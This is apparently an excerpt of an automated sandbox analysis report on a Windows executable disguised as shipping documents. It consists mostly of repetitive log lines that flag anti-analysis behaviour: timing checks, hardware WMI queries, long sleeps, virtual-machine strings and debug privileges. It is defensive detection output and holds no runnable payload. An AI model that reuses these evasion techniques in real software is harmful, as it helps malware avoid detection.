            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeAPI/Special instruction interceptor: Address: 675E863
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeAPI/Special instruction interceptor: Address: 31DE863
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeRDTSC instruction interceptor: First address: 6708F70 second address: 6708F70 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ax, bx 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F6830F0C228h 0x0000000b cmp esi, 20C649BBh 0x00000011 test cl, 00000060h 0x00000014 inc ebp 0x00000015 cmp eax, ecx 0x00000017 inc ebx 0x00000018 cmp dl, al 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeRDTSC instruction interceptor: First address: 3188F70 second address: 3188F70 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ax, bx 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F6830E09938h 0x0000000b cmp esi, 20C649BBh 0x00000011 test cl, 00000060h 0x00000014 inc ebp 0x00000015 cmp eax, ecx 0x00000017 inc ebx 0x00000018 cmp dl, al 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeMemory allocated: 35710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeMemory allocated: 37710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598418Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598311Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597965Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597808Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597589Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597266Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596594Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596375Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596047Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595937Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595498Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595391Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595266Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595141Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 594484Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeWindow / User API: threadDelayed 2180Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeWindow / User API: threadDelayed 7666Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeAPI coverage: 1.5 %
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -35971150943733603s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 428Thread sleep count: 2180 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 428Thread sleep count: 7666 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -599312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -599203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -599094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -598969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -598859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -598750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -598641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -598418s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -598311s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -598093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -597965s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -597808s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -597589s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -597375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -597266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -597047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -596828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -596719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -596594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -596484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -596375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -596266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -596156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -596047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -595937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -595828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -595719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -595609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -595498s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -595391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -595266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -595141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -595031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -594922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -594812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -594703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -594594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe TID: 5852Thread sleep time: -594484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_0040276E FindFirstFileW,4_2_0040276E
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405770
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_0040622B FindFirstFileW,FindClose,4_2_0040622B
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598418Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598311Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597965Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597808Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597589Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597266Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596594Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596375Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 596047Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595937Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595498Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595391Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595266Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595141Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeThread delayed: delay time: 594484Jump to behavior
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3304583690.000000000546E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3304583690.0000000005426000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(\G
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3304583690.000000000546E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeAPI call chain: ExitProcess graph end nodegraph_0-4507
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeAPI call chain: ExitProcess graph end nodegraph_0-4511
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeMemory allocated: page read and write | page guardJump to behavior
